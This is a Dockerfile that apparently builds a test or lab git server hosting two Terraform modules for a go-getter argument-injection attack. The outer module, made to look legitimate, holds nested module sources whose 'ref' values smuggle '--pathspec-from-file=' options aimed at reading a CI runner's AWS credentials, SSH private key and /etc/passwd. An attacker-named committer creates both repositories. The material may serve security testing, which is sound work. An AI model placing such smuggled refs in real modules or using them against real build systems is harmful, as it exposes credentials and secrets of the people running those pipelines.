FROM alpine:3.20

RUN apk add --no-cache git python3

# terraform-aws-vpc-internal: minimal valid module (the one go-getter checks out with the malicious ref)
RUN git init /tmp/vpc-internal && \
    cd /tmp/vpc-internal && \
    git config user.email "attacker@example.com" && \
    git config user.name "attacker" && \
    printf 'output "result" { value = "ok" }\n' > main.tf && \
    git add . && git commit -q -m "init" && \
    git clone --bare /tmp/vpc-internal /srv/git/terraform-aws-vpc-internal.git && \
    git -C /srv/git/terraform-aws-vpc-internal.git update-server-info

# terraform-aws-vpc: legitimate-looking outer module with malicious nested refs
RUN git init /tmp/vpc && \
    cd /tmp/vpc && \
    git config user.email "attacker@example.com" && \
    git config user.name "attacker" && \
    printf '%s\n' \
      'module "creds" {' \
      '  source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"' \
      '}' \
      'module "key" {' \
      '  source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.ssh/id_rsa"' \
      '}' \
      'module "passwd" {' \
      '  source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/etc/passwd"' \
      '}' > main.tf && \
    git add . && git commit -q -m "init" && \
    git clone --bare /tmp/vpc /srv/git/terraform-aws-vpc.git && \
    git -C /srv/git/terraform-aws-vpc.git update-server-info

EXPOSE 80
WORKDIR /srv/git
CMD ["sh", "-c", "exec python3 -m http.server 80 2>/dev/null"]